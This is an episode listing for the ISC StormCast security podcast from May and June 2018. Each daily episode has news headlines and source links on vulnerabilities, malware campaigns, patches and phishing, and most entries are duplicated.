Obfuscated JavaScript Targeting Mobile Devices https://isc.sans.edu/forums/diary/Malicious+JavaScript+Targeting+Mobile+Browsers/23778/ Axis Camera Vulnerabilities https://blog.vdoo.com/2018/06/18/vdoo-discovers-significant-vulnerabilities-in-axis-cameras/ Apple Caches Confidential Data on Unencrypted Drives https://wojciechregula.blog/your-encrypted-photos-in-macos-cache/ Andy Emulator Infected With CryptoMiner https://www.reddit.com/r/emulators/comments/8rj8g5/warning_andy_android_emulator_andyos_andyroid/
6/19/20185 minutes, 53 seconds
Episode Artwork

ISC StormCast for Monday, June 18th 2018

SMTP Strangeness - Possible C2 https://isc.sans.edu/forums/diary/SMTP+Strangeness+Possible+C2/23770/ Encrypted Office Documents https://isc.sans.edu/forums/diary/Encrypted+Office+Documents/23774/ Recent Port 8000 Scans https://www.bleepingcomputer.com/news/security/all-that-port-8000-traffic-this-week-yeah-thats-satori-looking-for-new-bots/ New Clipboard Cryptocoin Stealing Bot https://blog.360totalsecurity.com/en/new-cryptominer-hijacks-your-bitcoin-transaction-over-300000-computers-have-been-attacked/ WebUSB Weakness https://pwnaccelerator.github.io/2018/webusb-yubico-disclosure.html
6/18/20186 minutes, 32 seconds
Episode Artwork

ISC StormCast for Monday, June 18th 2018

SMTP Strangeness - Possible C2 https://isc.sans.edu/forums/diary/SMTP+Strangeness+Possible+C2/23770/ Encrypted Office Documents https://isc.sans.edu/forums/diary/Encrypted+Office+Documents/23774/ Recent Port 8000 Scans https://www.bleepingcomputer.com/news/security/all-that-port-8000-traffic-this-week-yeah-thats-satori-looking-for-new-bots/ New Clipboard Cryptocoin Stealing Bot https://blog.360totalsecurity.com/en/new-cryptominer-hijacks-your-bitcoin-transaction-over-300000-computers-have-been-attacked/ WebUSB Weakness https://pwnaccelerator.github.io/2018/webusb-yubico-disclosure.html
6/18/20186 minutes, 32 seconds
Episode Artwork

ISC StormCast for Friday, June 15th 2018

Analyzing a Compromised Wordpress Site https://isc.sans.edu/forums/diary/A+Bunch+of+Compromized+Wordpress+Sites/23764/ Breacking Bluetooth Low Energy Smart Padlock https://www.pentestpartners.com/security-blog/totally-pwning-the-tapplock-smart-lock/ WIM Disk Image Vulnerability https://blog.talosintelligence.com/2018/06/vulnerability-spotlight-talos-2018-0545.html Extracting Timely Sign-In Data from Office 365 Logs https://www.sans.org/reading-room/whitepapers/logging/extracting-timely-sign-in-data-office-365-logs-38435
6/15/201812 minutes, 14 seconds
Episode Artwork

ISC StormCast for Friday, June 15th 2018

Analyzing a Compromised Wordpress Site https://isc.sans.edu/forums/diary/A+Bunch+of+Compromized+Wordpress+Sites/23764/ Breacking Bluetooth Low Energy Smart Padlock https://www.pentestpartners.com/security-blog/totally-pwning-the-tapplock-smart-lock/ WIM Disk Image Vulnerability https://blog.talosintelligence.com/2018/06/vulnerability-spotlight-talos-2018-0545.html Extracting Timely Sign-In Data from Office 365 Logs https://www.sans.org/reading-room/whitepapers/logging/extracting-timely-sign-in-data-office-365-logs-38435
6/15/201812 minutes, 14 seconds
Episode Artwork

ISC StormCast for Thursday, June 14th 2018

From MicroTik With Love: Yet Another Router Botnet? https://isc.sans.edu/forums/diary/From+Microtik+with+Love/23762/ Using Cortana To Compromise Windows 10 https://securingtomorrow.mcafee.com/mcafee-labs/want-to-break-into-a-locked-windows-10-device-ask-cortana-cve-2018-8140/ Compromised Docker Images https://kromtech.com/blog/security-center/cryptojacking-invades-cloud-how-modern-containerization-trend-is-exploited-by-attackers Lazy FPU Save/Restore Allows Malware Access to FPU https://access.redhat.com/solutions/3485131
6/14/20185 minutes, 53 seconds
Episode Artwork

ISC StormCast for Thursday, June 14th 2018

From MicroTik With Love: Yet Another Router Botnet? https://isc.sans.edu/forums/diary/From+Microtik+with+Love/23762/ Using Cortana To Compromise Windows 10 https://securingtomorrow.mcafee.com/mcafee-labs/want-to-break-into-a-locked-windows-10-device-ask-cortana-cve-2018-8140/ Compromised Docker Images https://kromtech.com/blog/security-center/cryptojacking-invades-cloud-how-modern-containerization-trend-is-exploited-by-attackers Lazy FPU Save/Restore Allows Malware Access to FPU https://access.redhat.com/solutions/3485131
6/14/20185 minutes, 53 seconds
Episode Artwork

ISC StormCast for Wednesday, June 13th 2018

Microsoft Patch Tuesday https://isc.sans.edu/forums/diary/Microsoft+June+2018+Patch+Tuesday/23758/ Apple Code Signing Verification Vulnerability https://www.okta.com/security-blog/2018/06/issues-around-third-party-apple-code-signing-checks/ Google Chrome Restricting Inline Extension Install https://blog.chromium.org/2018/06/improving-extension-transparency-for.html
6/13/20185 minutes, 50 seconds
Episode Artwork

ISC StormCast for Wednesday, June 13th 2018

Microsoft Patch Tuesday https://isc.sans.edu/forums/diary/Microsoft+June+2018+Patch+Tuesday/23758/ Apple Code Signing Verification Vulnerability https://www.okta.com/security-blog/2018/06/issues-around-third-party-apple-code-signing-checks/ Google Chrome Restricting Inline Extension Install https://blog.chromium.org/2018/06/improving-extension-transparency-for.html
6/13/20185 minutes, 50 seconds
Episode Artwork

ISC StormCast for Tuesday, June 12th 2018

More Malspam Pushing Lokibot https://isc.sans.edu/forums/diary/More+malspam+pushing+Lokibot/23754/ Ethereum JSON RPC Theft https://twitter.com/360Netlab/status/1006065566728085504 CryptoCurrency Miner Plays hide-and-seek https://www.bleepingcomputer.com/news/security/cryptocurrency-miner-plays-hide-and-seek-with-popular-games-and-tools/ Apple Outlaws Crypto Currency Miners in App Store https://developer.apple.com/app-store/review/guidelines/#hardware-compatibility FBI Arrests Suspect in BEC Investigation https://www.fbi.gov/news/stories/international-bec-takedown-061118
6/12/20184 minutes, 46 seconds
Episode Artwork

ISC StormCast for Tuesday, June 12th 2018

More Malspam Pushing Lokibot https://isc.sans.edu/forums/diary/More+malspam+pushing+Lokibot/23754/ Ethereum JSON RPC Theft https://twitter.com/360Netlab/status/1006065566728085504 CryptoCurrency Miner Plays hide-and-seek https://www.bleepingcomputer.com/news/security/cryptocurrency-miner-plays-hide-and-seek-with-popular-games-and-tools/ Apple Outlaws Crypto Currency Miners in App Store https://developer.apple.com/app-store/review/guidelines/#hardware-compatibility FBI Arrests Suspect in BEC Investigation https://www.fbi.gov/news/stories/international-bec-takedown-061118
6/12/20184 minutes, 46 seconds
Episode Artwork

ISC StormCast for Monday, June 11th 2018

The Seven Properties of Highly Secure Devices https://www.microsoft.com/en-us/research/wp-content/uploads/2017/03/SevenPropertiesofHighlySecureDevices.pdf Finding Deserialisation Issues With Burp https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/june/finding-deserialisation-issues-has-never-been-easier-freddy-the-serialisation-killer/ FTC Starts Looking Into Cryptojacking https://www.consumer.ftc.gov/blog/2018/06/protecting-your-devices-cryptojacking Drupal Disputes Number of Vulnerable Sites https://groups.drupal.org/node/520149
6/11/20185 minutes, 30 seconds
Episode Artwork

ISC StormCast for Monday, June 11th 2018

The Seven Properties of Highly Secure Devices https://www.microsoft.com/en-us/research/wp-content/uploads/2017/03/SevenPropertiesofHighlySecureDevices.pdf Finding Deserialisation Issues With Burp https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/june/finding-deserialisation-issues-has-never-been-easier-freddy-the-serialisation-killer/ FTC Starts Looking Into Cryptojacking https://www.consumer.ftc.gov/blog/2018/06/protecting-your-devices-cryptojacking Drupal Disputes Number of Vulnerable Sites https://groups.drupal.org/node/520149
6/11/20185 minutes, 30 seconds
Episode Artwork

ISC StormCast for Friday, June 8th 2018

Critical Adobe Flash Update https://helpx.adobe.com/security/products/flash-player/apsb18-19.html SuperMicro Firmware Vulnerability https://blog.eclypsium.com/2018/06/07/firmware-vulnerabilities-in-supermicro-systems/ FOSCAM Video Camera Vulnerabilities https://blog.vdoo.com/2018/06/06/vdoo-has-found-major-vulnerabilities-in-foscam-cameras/ Sofacy Update https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/ Automated Twitter Loot Collection https://isc.sans.edu/forums/diary/Automated+twitter+loot+collection/23743/
6/8/20185 minutes, 36 seconds
Episode Artwork

ISC StormCast for Friday, June 8th 2018

Critical Adobe Flash Update https://helpx.adobe.com/security/products/flash-player/apsb18-19.html SuperMicro Firmware Vulnerability https://blog.eclypsium.com/2018/06/07/firmware-vulnerabilities-in-supermicro-systems/ FOSCAM Video Camera Vulnerabilities https://blog.vdoo.com/2018/06/06/vdoo-has-found-major-vulnerabilities-in-foscam-cameras/ Sofacy Update https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/ Automated Twitter Loot Collection https://isc.sans.edu/forums/diary/Automated+twitter+loot+collection/23743/
6/8/20185 minutes, 36 seconds
Episode Artwork

ISC StormCast for Thursday, June 7th 2018

VPNFilter Update https://blog.talosintelligence.com/2018/06/vpnfilter-update.html Prowli Botnet https://www.guardicore.com/2018/06/operation-prowli-traffic-manipulation-cryptocurrency-mining/ Cisco Security Bulletins https://tools.cisco.com/security/center/publicationListing.x F-Secure RAR Vulnerability https://www.f-secure.com/en/web/labs_global/fsc-2018-2 PCAP to Weblogs https://isc.sans.edu/forums/diary/Converting+PCAP+Web+Traffic+to+Apache+Log/23739/
6/7/20185 minutes, 5 seconds
Episode Artwork

ISC StormCast for Thursday, June 7th 2018

VPNFilter Update https://blog.talosintelligence.com/2018/06/vpnfilter-update.html Prowli Botnet https://www.guardicore.com/2018/06/operation-prowli-traffic-manipulation-cryptocurrency-mining/ Cisco Security Bulletins https://tools.cisco.com/security/center/publicationListing.x F-Secure RAR Vulnerability https://www.f-secure.com/en/web/labs_global/fsc-2018-2 PCAP to Weblogs https://isc.sans.edu/forums/diary/Converting+PCAP+Web+Traffic+to+Apache+Log/23739/
6/7/20185 minutes, 5 seconds
Episode Artwork

ISC StormCast for Wednesday, June 6th 2018

Analysis of a Post Exploit Script Malicious Post-Exploitation Batch File Zip Slip Vulnerability https://snyk.io/research/zip-slip-vulnerability Redis Exploits https://www.incapsula.com/blog/report-75-of-open-redis-servers-are-infected.html Drupalgeddon 2 Update https://badpackets.net/over-100000-drupal-websites-vulnerable-to-drupalgeddon-2-cve-2018-7600/
6/6/20185 minutes, 41 seconds
Episode Artwork

ISC StormCast for Wednesday, June 6th 2018

Analysis of a Post Exploit Script Malicious Post-Exploitation Batch File Zip Slip Vulnerability https://snyk.io/research/zip-slip-vulnerability Redis Exploits https://www.incapsula.com/blog/report-75-of-open-redis-servers-are-infected.html Drupalgeddon 2 Update https://badpackets.net/over-100000-drupal-websites-vulnerable-to-drupalgeddon-2-cve-2018-7600/
6/6/20185 minutes, 41 seconds
Episode Artwork

ISC StormCast for Tuesday, June 5th 2018

Running Only Signed Code. Does it work in Windows 10? https://isc.sans.edu/forums/diary/Digging+into+Authenticode+Certificates/23731/ Misconfigured G-Suite Mailing Lists https://www.kennasecurity.com/widespread-google-groups-misconfiguration-exposes-sensitive-information/ Microsoft Releases Open Source Post Quantum VPN https://github.com/Microsoft/PQCrypto-VPN
6/5/20186 minutes, 2 seconds
Episode Artwork

ISC StormCast for Tuesday, June 5th 2018

Running Only Signed Code. Does it work in Windows 10? https://isc.sans.edu/forums/diary/Digging+into+Authenticode+Certificates/23731/ Misconfigured G-Suite Mailing Lists https://www.kennasecurity.com/widespread-google-groups-misconfiguration-exposes-sensitive-information/ Microsoft Releases Open Source Post Quantum VPN https://github.com/Microsoft/PQCrypto-VPN
6/5/20186 minutes, 2 seconds
Episode Artwork

ISC StormCast for Monday, June 4th 2018

Apple Patches Everything https://isc.sans.edu/forums/diary/Apple+Security+Updates/23727/ VPNFilter Makes a Comeback https://jask.com/from-russia-with-love/ Reverse Analysis with Radare2 https://isc.sans.edu/forums/diary/Binary+analysis+with+Radare2/23723/ Pet Location Tracker Vulnerabilities https://threatpost.com/pet-trackers-open-to-mitm-attacks-interception/132291/
6/4/20185 minutes, 29 seconds
Episode Artwork

ISC StormCast for Monday, June 4th 2018

Apple Patches Everything https://isc.sans.edu/forums/diary/Apple+Security+Updates/23727/ VPNFilter Makes a Comeback https://jask.com/from-russia-with-love/ Reverse Analysis with Radare2 https://isc.sans.edu/forums/diary/Binary+analysis+with+Radare2/23723/ Pet Location Tracker Vulnerabilities https://threatpost.com/pet-trackers-open-to-mitm-attacks-interception/132291/
6/4/20185 minutes, 29 seconds
Episode Artwork

ISC StormCast for Friday, June 1st 2018

Safely Resetting Routers https://isc.sans.edu/forums/diary/Resetting+Your+Router+the+Paranoid+Right+Way/23719/ CSS mix-blend-mode Side Channel Attack https://www.evonide.com/side-channel-attacking-browsers-through-css3-features/ New ActiveX Exploit Seen in the Wild https://www.krcert.or.kr/data/secNoticeView.do?bulletin_writing_sequence=27263 Apple iMessage Security https://support.apple.com/en-us/HT202303 10 Year Old Vulnerability in Steam Discovered https://www.contextis.com/blog/frag-grenade-a-remote-code-execution-vulnerability-in-the-steam-client
6/1/20185 minutes, 45 seconds
Episode Artwork

ISC StormCast for Friday, June 1st 2018

Safely Resetting Routers https://isc.sans.edu/forums/diary/Resetting+Your+Router+the+Paranoid+Right+Way/23719/ CSS mix-blend-mode Side Channel Attack https://www.evonide.com/side-channel-attacking-browsers-through-css3-features/ New ActiveX Exploit Seen in the Wild https://www.krcert.or.kr/data/secNoticeView.do?bulletin_writing_sequence=27263 Apple iMessage Security https://support.apple.com/en-us/HT202303 10 Year Old Vulnerability in Steam Discovered https://www.contextis.com/blog/frag-grenade-a-remote-code-execution-vulnerability-in-the-steam-client
6/1/20185 minutes, 45 seconds
Episode Artwork

ISC StormCast for Thursday, May 31st 2018

Windows JScript Vulnerability https://www.zerodayinitiative.com/advisories/ZDI-18-534/ Two Git Vulnerabilities Patched https://marc.info/?l=git&m=152761328506724&w=2 https://blogs.msdn.microsoft.com/devops/2018/05/29/announcing-the-may-2018-git-security-vulnerability/ SpamCannibal Blacklist Temporarily Marks All IPs as "Spam" https://twitter.com/GossiTheDog/status/1001778042400854016 QRadar Remote Code Execution https://blogs.securiteam.com/index.php/archives/3689
5/31/20184 minutes, 45 seconds
Episode Artwork

ISC StormCast for Thursday, May 31st 2018

Windows JScript Vulnerability https://www.zerodayinitiative.com/advisories/ZDI-18-534/ Two Git Vulnerabilities Patched https://marc.info/?l=git&m=152761328506724&w=2 https://blogs.msdn.microsoft.com/devops/2018/05/29/announcing-the-may-2018-git-security-vulnerability/ SpamCannibal Blacklist Temporarily Marks All IPs as "Spam" https://twitter.com/GossiTheDog/status/1001778042400854016 QRadar Remote Code Execution https://blogs.securiteam.com/index.php/archives/3689
5/31/20184 minutes, 45 seconds
Episode Artwork

ISC StormCast for Wednesday, May 30th 2018

New DNS Features https://isc.sans.edu/forums/diary/DNS+is+Changing+Are+you+Ready/23711/ Apple Updates https://support.apple.com/en-us/HT201222 Scans For Misconfigured EOS Blockchain Nodes https://www.bleepingcomputer.com/news/security/misconfigured-eos-blockchain-nodes-under-attack/ NPM Bug Causes Update Failures / Application Crashes https://github.com/npm/npm/issues/20791#issuecomment-392648459 MnuBot Exfiltrates Data Via MSSQL https://securityintelligence.com/new-banking-trojan-mnubot-discovered-by-ibm-x-force-research/
5/29/20186 minutes, 6 seconds
Episode Artwork

ISC StormCast for Wednesday, May 30th 2018

New DNS Features https://isc.sans.edu/forums/diary/DNS+is+Changing+Are+you+Ready/23711/ Apple Updates https://support.apple.com/en-us/HT201222 Scans For Misconfigured EOS Blockchain Nodes https://www.bleepingcomputer.com/news/security/misconfigured-eos-blockchain-nodes-under-attack/ NPM Bug Causes Update Failures / Application Crashes https://github.com/npm/npm/issues/20791#issuecomment-392648459 MnuBot Exfiltrates Data Via MSSQL https://securityintelligence.com/new-banking-trojan-mnubot-discovered-by-ibm-x-force-research/
5/29/20186 minutes, 6 seconds
Episode Artwork

ISC StormCast for Tuesday, May 29th 2018

Ultrasound Mobile Location Tracking https://isc.sans.edu/forums/diary/Do+you+hear+Laurel+or+Yanny+or+is+it+OnOff+Keying/23707/ Analyzing Malware Created with NSIS https://isc.sans.edu/forums/diary/Quick+analysis+of+malware+created+with+NSIS/23703/ Obfuscated Word Macro https://isc.sans.edu/forums/diary/Antivirus+Evasion+Easy+as+123/23701/ Z-Wave Attacks https://www.pentestpartners.com/security-blog/z-shave-exploiting-z-wave-downgrade-attacks/ https://www.silabs.com/community/blog.entry.html/2018/05/23/tl_dr_your_door_is-g1zC Electron Framework Protocol Handler Patch Bypass https://blog.doyensec.com/2018/05/24/electron-win-protocol-handler-bug-bypass.html
5/29/20185 minutes, 56 seconds
Episode Artwork

ISC StormCast for Tuesday, May 29th 2018

Ultrasound Mobile Location Tracking https://isc.sans.edu/forums/diary/Do+you+hear+Laurel+or+Yanny+or+is+it+OnOff+Keying/23707/ Analyzing Malware Created with NSIS https://isc.sans.edu/forums/diary/Quick+analysis+of+malware+created+with+NSIS/23703/ Obfuscated Word Macro https://isc.sans.edu/forums/diary/Antivirus+Evasion+Easy+as+123/23701/ Z-Wave Attacks https://www.pentestpartners.com/security-blog/z-shave-exploiting-z-wave-downgrade-attacks/ https://www.silabs.com/community/blog.entry.html/2018/05/23/tl_dr_your_door_is-g1zC Electron Framework Protocol Handler Patch Bypass https://blog.doyensec.com/2018/05/24/electron-win-protocol-handler-bug-bypass.html
5/29/20185 minutes, 56 seconds
Episode Artwork

ISC StormCast for Friday, May 25th 2018

GDPR Going Into Effect May 25th https://en.wikipedia.org/wiki/General_Data_Protection_Regulation Bitcoin Gold Double Spent Attack https://forum.bitcoingold.org/t/double-spend-attack-on-exchanges/1362 Amazon Alexa Forwards Random Conversations https://www.kiro7.com/news/local/woman-says-her-amazon-device-recorded-private-conversation-sent-it-out-to-random-contact/755507974 Verge Crypto Coin Attacked Again https://www.bleepingcomputer.com/news/security/verge-cryptocurrency-network-falls-victim-to-same-attack-even-after-hard-fork/
5/25/20184 minutes, 39 seconds
Episode Artwork

ISC StormCast for Friday, May 25th 2018

GDPR Going Into Effect May 25th https://en.wikipedia.org/wiki/General_Data_Protection_Regulation Bitcoin Gold Double Spent Attack https://forum.bitcoingold.org/t/double-spend-attack-on-exchanges/1362 Amazon Alexa Forwards Random Conversations https://www.kiro7.com/news/local/woman-says-her-amazon-device-recorded-private-conversation-sent-it-out-to-random-contact/755507974 Verge Crypto Coin Attacked Again https://www.bleepingcomputer.com/news/security/verge-cryptocurrency-network-falls-victim-to-same-attack-even-after-hard-fork/
5/25/20184 minutes, 39 seconds
Episode Artwork

ISC StormCast for Thursday, May 24th 2018

VPNFilter Malware Affecting Cisco Routers https://blog.talosintelligence.com/2018/05/VPNFilter.html DLink Vulnerabilities https://securelist.com/backdoors-in-d-links-backyard/85530/ Firefox Disabling "Spy APIs" and enabling 2FA https://www.fxsitecompat.com/en-CA/docs/2018/ambient-light-and-proximity-sensor-apis-have-been-disabled/
5/24/20185 minutes, 35 seconds
Episode Artwork

ISC StormCast for Thursday, May 24th 2018

VPNFilter Malware Affecting Cisco Routers https://blog.talosintelligence.com/2018/05/VPNFilter.html DLink Vulnerabilities https://securelist.com/backdoors-in-d-links-backyard/85530/ Firefox Disabling "Spy APIs" and enabling 2FA https://www.fxsitecompat.com/en-CA/docs/2018/ambient-light-and-proximity-sensor-apis-have-been-disabled/
5/24/20185 minutes, 35 seconds
Episode Artwork

ISC StormCast for Wednesday, May 23rd 2018

Malicious SYLK Files Used to Execute Code in Excel https://isc.sans.edu/forums/diary/Malware+Distributed+via+slk+Files/23687/ BMW Releases Patches for Several Cars https://keenlab.tencent.com/en/Experimental_Security_Assessment_of_BMW_Cars_by_KeenLab.pdf Mac Crypto Miners https://blog.malwarebytes.com/threat-analysis/mac-threat-analysis/2018/05/new-mac-cryptominer-uses-xmrig/ VMWare Spectre Updates https://www.vmware.com/security/advisories/VMSA-2018-0012.html
5/23/20184 minutes, 50 seconds
Episode Artwork

ISC StormCast for Wednesday, May 23rd 2018

Malicious SYLK Files Used to Execute Code in Excel https://isc.sans.edu/forums/diary/Malware+Distributed+via+slk+Files/23687/ BMW Releases Patches for Several Cars https://keenlab.tencent.com/en/Experimental_Security_Assessment_of_BMW_Cars_by_KeenLab.pdf Mac Crypto Miners https://blog.malwarebytes.com/threat-analysis/mac-threat-analysis/2018/05/new-mac-cryptominer-uses-xmrig/ VMWare Spectre Updates https://www.vmware.com/security/advisories/VMSA-2018-0012.html
5/23/20184 minutes, 50 seconds
Episode Artwork

ISC StormCast for Tuesday, May 22nd 2018

Spectre NG Patches https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV180012 https://newsroom.intel.com/editorials/addressing-new-research-for-side-channel-analysis/ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV180012 https://bugs.chromium.org/p/project-zero/issues/detail?id=1528 New "Moon" Variant http://blog.netlab.360.com/gpon-exploit-in-the-wild-iv-themoon-botnet-join-in-with-a-0day/ https://isc.sans.edu/forums/diary/Something+Wicked+this+way+comes/23681/ Extracting Keys From Windows ssh-agent https://blog.ropnop.com/extracting-ssh-private-keys-from-windows-10-ssh-agent/
5/22/20185 minutes, 27 seconds
Episode Artwork

ISC StormCast for Tuesday, May 22nd 2018

Spectre NG Patches https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV180012 https://newsroom.intel.com/editorials/addressing-new-research-for-side-channel-analysis/ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV180012 https://bugs.chromium.org/p/project-zero/issues/detail?id=1528 New "Moon" Variant http://blog.netlab.360.com/gpon-exploit-in-the-wild-iv-themoon-botnet-join-in-with-a-0day/ https://isc.sans.edu/forums/diary/Something+Wicked+this+way+comes/23681/ Extracting Keys From Windows ssh-agent https://blog.ropnop.com/extracting-ssh-private-keys-from-windows-10-ssh-agent/
5/22/20185 minutes, 27 seconds
Episode Artwork

ISC StormCast for Monday, May 21st 2018

Redis Cryptocoin Mining Worm https://isc.sans.edu/forums/diary/Anatomy+of+a+Redis+mining+worm/23673/ Evolving Chrome's Security Indicator https://blog.chromium.org/2018/05/evolving-chromes-security-indicators.html DrayTek CSRF 0-Day Exploited to Change DNS Servers https://www.draytek.co.uk/support/security-advisories/kb-advisory-csrf-and-dns-dhcp-web-attacks Rowhammer Remote Exploit https://www.cs.vu.nl/~herbertb/download/papers/throwhammer_atc18.pdf https://arxiv.org/abs/1805.04956
5/21/20185 minutes, 46 seconds
Episode Artwork

ISC StormCast for Monday, May 21st 2018

Redis Cryptocoin Mining Worm https://isc.sans.edu/forums/diary/Anatomy+of+a+Redis+mining+worm/23673/ Evolving Chrome's Security Indicator https://blog.chromium.org/2018/05/evolving-chromes-security-indicators.html DrayTek CSRF 0-Day Exploited to Change DNS Servers https://www.draytek.co.uk/support/security-advisories/kb-advisory-csrf-and-dns-dhcp-web-attacks Rowhammer Remote Exploit https://www.cs.vu.nl/~herbertb/download/papers/throwhammer_atc18.pdf https://arxiv.org/abs/1805.04956
5/21/20185 minutes, 46 seconds
Episode Artwork

ISC StormCast for Friday, May 18th 2018

Claymore Miner Attack https://isc.sans.edu/diary/Insecure+Claymore+Miner+Management+API+Exploited+in+the+Wild/23665/ PCI DSS Version 3.2.1. Released https://isc.sans.edu/forums/diary/PCI+DSS+version+321+is+out/23667/ Keeper Releases Update https://keepersecurity.com/blog/2018/05/15/response-may-15-seclists-report/ Cisco Security Update https://tools.cisco.com/security/center/publicationListing.x
5/18/20185 minutes, 42 seconds
Episode Artwork

ISC StormCast for Friday, May 18th 2018

Claymore Miner Attack https://isc.sans.edu/diary/Insecure+Claymore+Miner+Management+API+Exploited+in+the+Wild/23665/ PCI DSS Version 3.2.1. Released https://isc.sans.edu/forums/diary/PCI+DSS+version+321+is+out/23667/ Keeper Releases Update https://keepersecurity.com/blog/2018/05/15/response-may-15-seclists-report/ Cisco Security Update https://tools.cisco.com/security/center/publicationListing.x
5/18/20185 minutes, 42 seconds
Episode Artwork

ISC StormCast for Thursday, May 17th 2018

Critical DHCP Client Vulnerability in RedHat Enterprise Server 6/7 https://access.redhat.com/security/vulnerabilities/3442151 UPnP Misconfiguration DDoS Attack https://www.theregister.co.uk/2018/05/16/upnp_amplifies_ddos_attacks/ Ubuntu Snap Store Miner Incident Followup https://blog.ubuntu.com/2018/05/15/trust-and-security-in-the-snap-store iOS / Android "Zipper Down" Vulnerability https://zipperdown.org/
5/16/20186 minutes, 27 seconds
Episode Artwork

ISC StormCast for Thursday, May 17th 2018

Critical DHCP Client Vulnerability in RedHat Enterprise Server 6/7 https://access.redhat.com/security/vulnerabilities/3442151 UPnP Misconfiguration DDoS Attack https://www.theregister.co.uk/2018/05/16/upnp_amplifies_ddos_attacks/ Ubuntu Snap Store Miner Incident Followup https://blog.ubuntu.com/2018/05/15/trust-and-security-in-the-snap-store iOS / Android "Zipper Down" Vulnerability https://zipperdown.org/
5/16/20186 minutes, 27 seconds
Episode Artwork

ISC StormCast for Wednesday, May 16th 2018

PDF Exploit (and Windows Priv. Escalation) Leaked https://www.welivesecurity.com/2018/05/15/tale-two-zero-days/ Possible Vulnerability in Keeper Password Manager http://seclists.org/fulldisclosure/2018/May/41 MyEtherWallet Phishing https://isc.sans.edu/forums/diary/Phishing+emails+for+fake+MyEtherWallet+login+page/23655/
5/16/20186 minutes, 56 seconds
Episode Artwork

ISC StormCast for Wednesday, May 16th 2018

PDF Exploit (and Windows Priv. Escalation) Leaked https://www.welivesecurity.com/2018/05/15/tale-two-zero-days/ Possible Vulnerability in Keeper Password Manager http://seclists.org/fulldisclosure/2018/May/41 MyEtherWallet Phishing https://isc.sans.edu/forums/diary/Phishing+emails+for+fake+MyEtherWallet+login+page/23655/
5/16/20186 minutes, 56 seconds
Episode Artwork

ISC StormCast for Tuesday, May 15th 2018

PGP/SMIME efail Vulnerability https://efail.de Adobe PDF Reader / Acrobat Bulletins https://helpx.adobe.com/security/products/acrobat/apsb18-09.html
5/15/20186 minutes, 31 seconds
Episode Artwork

ISC StormCast for Tuesday, May 15th 2018

PGP/SMIME efail Vulnerability https://efail.de Adobe PDF Reader / Acrobat Bulletins https://helpx.adobe.com/security/products/acrobat/apsb18-09.html
5/15/20186 minutes, 31 seconds
Episode Artwork

ISC StormCast for Monday, May 14th 2018

Odd njRat Like Scans Reversed C2 traffic from China Signal Vulnerability (Possibly in Electron, which affects Skype/Slack/others) https://twitter.com/ortegaalfredo/status/995017143002509313 Electron Vulnerability https://www.trustwave.com/Resources/SpiderLabs-Blog/CVE-2018-1000136---Electron-nodeIntegration-Bypass/ Cryptocoin Miner Found in Ubuntu Snap Store https://github.com/canonical-websites/snapcraft.io/issues/651
5/14/20185 minutes, 53 seconds
Episode Artwork

ISC StormCast for Monday, May 14th 2018

Odd njRat Like Scans Reversed C2 traffic from China Signal Vulnerability (Possibly in Electron, which affects Skype/Slack/others) https://twitter.com/ortegaalfredo/status/995017143002509313 Electron Vulnerability https://www.trustwave.com/Resources/SpiderLabs-Blog/CVE-2018-1000136---Electron-nodeIntegration-Bypass/ Cryptocoin Miner Found in Ubuntu Snap Store https://github.com/canonical-websites/snapcraft.io/issues/651
5/14/20185 minutes, 53 seconds
Episode Artwork

ISC StormCast for Friday, May 11th 2018

DNS Exfiltration in Windows https://isc.sans.edu/forums/diary/Exfiltrating+data+from+very+isolated+environments/23645/ Fake Electrun Wallet https://github.com/spesmilo/electrum-docs/blob/master/decompiling_guide.md Treasure Hunter PoS Malware Source Code Leaked https://www.flashpoint-intel.com/blog/treasurehunter-source-code-leaked/ More Malicious Chrome Extensions Spreading via Facebook https://blog.radware.com/security/2018/05/nigelthorn-malware-abuses-chrome-extensions/
5/11/20185 minutes, 14 seconds
Episode Artwork

ISC StormCast for Friday, May 11th 2018

DNS Exfiltration in Windows https://isc.sans.edu/forums/diary/Exfiltrating+data+from+very+isolated+environments/23645/ Fake Electrun Wallet https://github.com/spesmilo/electrum-docs/blob/master/decompiling_guide.md Treasure Hunter PoS Malware Source Code Leaked https://www.flashpoint-intel.com/blog/treasurehunter-source-code-leaked/ More Malicious Chrome Extensions Spreading via Facebook https://blog.radware.com/security/2018/05/nigelthorn-malware-abuses-chrome-extensions/
5/11/20185 minutes, 14 seconds
Episode Artwork

ISC StormCast for Thursday, May 10th 2018

Loyds Bank Phish Leads to Trickbot https://isc.sans.edu/forums/diary/Nice+Phishing+Sample+Delivering+Trickbot/23641/ Firefox Group Policy Engine https://www.bleepingcomputer.com/news/software/group-policy-support-coming-to-firefox-60/ OS Vendors Fix Intel Debug Flaw https://www.kb.cert.org/vuls/id/631579 Cryptocoin Miner in Excel https://charles.dardaman.com/js_coinhive_in_excel
5/10/20184 minutes, 1 second
Episode Artwork

ISC StormCast for Thursday, May 10th 2018

Loyds Bank Phish Leads to Trickbot https://isc.sans.edu/forums/diary/Nice+Phishing+Sample+Delivering+Trickbot/23641/ Firefox Group Policy Engine https://www.bleepingcomputer.com/news/software/group-policy-support-coming-to-firefox-60/ OS Vendors Fix Intel Debug Flaw https://www.kb.cert.org/vuls/id/631579 Cryptocoin Miner in Excel https://charles.dardaman.com/js_coinhive_in_excel
5/10/20184 minutes, 1 second
Episode Artwork

ISC StormCast for Wednesday, May 9th 2018

Microsoft Patch Tuesday https://isc.sans.edu/forums/diary/Microsoft+May+2018+Patch+Tuesday/23637/ Basestriker Vulnerability Hitting Office 365 https://www.avanan.com/resources/basestriker-vulnerability-office-365 wget Cookie Injection Vulnerability http://seclists.org/fulldisclosure/2018/May/20
5/9/20186 minutes, 21 seconds
Episode Artwork

ISC StormCast for Wednesday, May 9th 2018

Microsoft Patch Tuesday https://isc.sans.edu/forums/diary/Microsoft+May+2018+Patch+Tuesday/23637/ Basestriker Vulnerability Hitting Office 365 https://www.avanan.com/resources/basestriker-vulnerability-office-365 wget Cookie Injection Vulnerability http://seclists.org/fulldisclosure/2018/May/20
5/9/20186 minutes, 21 seconds
Episode Artwork

